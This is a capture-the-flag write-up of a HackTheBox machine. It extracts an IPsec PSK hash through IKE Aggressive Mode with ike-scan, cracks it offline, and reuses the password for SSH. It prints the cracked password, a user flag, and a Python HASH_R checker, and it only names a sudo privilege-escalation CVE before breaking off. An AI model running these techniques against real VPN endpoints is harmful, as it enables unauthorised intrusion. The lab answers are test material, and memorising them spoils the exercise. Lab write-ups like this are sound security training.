Task: HackTheBox medium machine with IPsec VPN (strongSwan) on UDP/500 and SSH. Solution: Extract PSK hash via IKE Aggressive Mode, crack it, reuse password for SSH access, then exploit CVE-2025-32463 (sudo 1.9.17 chroot LPE via nsswitch.conf poisoning) for root.



Expressway — HackTheBox

Description

HackTheBox medium difficulty machine. Debian server with IPsec VPN (strongSwan) on UDP/500 and SSH on TCP/22. Initial access via PSK hash extraction from IKE Aggressive Mode and dictionary cracking, then password reuse for SSH. Privilege escalation through CVE-2025-32463 — a vulnerability in sudo 1.9.17 that allows loading an arbitrary shared library as root via nsswitch.conf substitution in a user-controlled chroot.

Reconnaissance

Port Scanning

Nmap discovered only 2 TCP ports:

  • 22/tcp — SSH (OpenSSH 10.0p2 Debian)
  • 53/tcp — unknown service (rabbit hole: connection establishes but any data causes "Network is down")

Key finding — UDP port 500 (IKE/ISAKMP):

nmap -sU -p 500 10.129.4.240 # 500/udp open isakmp

Analysis

IKE Enumeration

Probing the VPN service with ike-scan:

ike-scan 10.129.4.240

Result — IKEv1 Main Mode handshake with parameters:

  • Encryption: 3DES
  • Hash: SHA1
  • DH Group: 2 (modp1024)
  • Auth: PSK (Pre-Shared Key)
  • XAUTH support
  • Dead Peer Detection v1.0

Weak parameters (3DES + SHA1 + DH Group 2) combined with PSK authentication are a classic vector for an Aggressive Mode attack.

IKE Aggressive Mode — PSK Hash Extraction

IKEv1 Aggressive Mode sends the responder's PSK-derived hash (HASH_R) unencrypted, so it can be captured and cracked offline (in Main Mode the identity and hash exchange are encrypted):

ike-scan --aggressive --id=vpn --pskcrack=ike_hash.txt 10.129.4.240

The server responded with an Aggressive Mode handshake and revealed its identity:

PSK Cracking

psk-crack -d rockyou.txt ike_hash.txt

PSK: freakingrockstarontheroad
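To make concrete what psk-crack is checking, here is an added Python example (not from the writeup and not ike-scan's or psk-crack's code) that recomputes HASH_R per RFC 2409 for the SHA1/PSK proposal seen above and tests candidate PSKs against a record in ike-scan's --pskcrack layout. The field order (g_xr:g_xi:cky_r:cky_i:sai_b:idir_b:ni_b:nr_b:hash_r, hex) is assumed, and the record is constructed from synthetic values rather than captured from the box; only two HMAC-SHA1 calls are needed per guess, which is why a PSK from a wordlist falls quickly and why a long random PSK, certificate/EAP authentication, or disabling Aggressive Mode is the fix.

```python
import hashlib
import hmac
from typing import Iterable, Optional

# Assumed ike-scan --pskcrack field order (colon-separated hex), see lead-in.
FIELDS = ["g_xr", "g_xi", "cky_r", "cky_i", "sai_b", "idir_b", "ni_b", "nr_b", "hash_r"]


def parse_pskcrack_record(line: str) -> dict:
    """Split one ike-scan PSK record into raw byte fields."""
    parts = line.strip().split(":")
    if len(parts) != len(FIELDS):
        raise ValueError(f"expected {len(FIELDS)} fields, got {len(parts)}")
    return {name: bytes.fromhex(value) for name, value in zip(FIELDS, parts)}


def ikev1_hash_r(psk: bytes, r: dict) -> bytes:
    """RFC 2409 responder hash for PSK auth with the SHA1 proposal (prf = HMAC-SHA1)."""
    # SKEYID = prf(pre-shared-key, Ni_b | Nr_b): the PSK is the only secret input
    skeyid = hmac.new(psk, r["ni_b"] + r["nr_b"], hashlib.sha1).digest()
    # HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b); every one of
    # these inputs crosses the wire unencrypted in Aggressive Mode, hence offline checking
    public = r["g_xr"] + r["g_xi"] + r["cky_r"] + r["cky_i"] + r["sai_b"] + r["idir_b"]
    return hmac.new(skeyid, public, hashlib.sha1).digest()


def check_candidates(record: dict, candidates: Iterable[str]) -> Optional[str]:
    """Return the first candidate whose recomputed HASH_R equals the captured one, else None."""
    for candidate in candidates:
        if hmac.compare_digest(ikev1_hash_r(candidate.encode(), record), record["hash_r"]):
            return candidate
    return None


def build_sample_record(psk: str) -> str:
    """Constructed test record (synthetic values, not a capture); hash_r derived from psk."""
    fields = {
        "g_xr": bytes([0x11]) * 128,  # 1024-bit modp1024 public values, synthetic
        "g_xi": bytes([0x22]) * 128,
        "cky_r": bytes.fromhex("0102030405060708"),
        "cky_i": bytes.fromhex("a1a2a3a4a5a6a7a8"),
        "sai_b": bytes.fromhex("00000001000000010000002401010000"),  # SA body, synthetic
        "idir_b": b"\x03\x00\x00\x00" + b"vpn@example.invalid",  # ID_USER_FQDN, proto/port 0
        "ni_b": bytes([0x33]) * 20,
        "nr_b": bytes([0x44]) * 20,
    }
    fields["hash_r"] = ikev1_hash_r(psk.encode(), fields)
    return ":".join(fields[name].hex() for name in FIELDS)
```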

Solution

Step 1: User Access — SSH via Password Reuse

From the IKE identity [email protected], the username ike was extracted. The VPN PSK was reused as the SSH password:

sshpass -p 'freakingrockstarontheroad' ssh [email protected]

Successful login as ike (uid=1001, groups: ike, proxy).

cat /home/ike/user.txt # d92ebe2ef753a2414aff0ba42be769c6

Step 2: Enumeration for Privilege Escalation

...
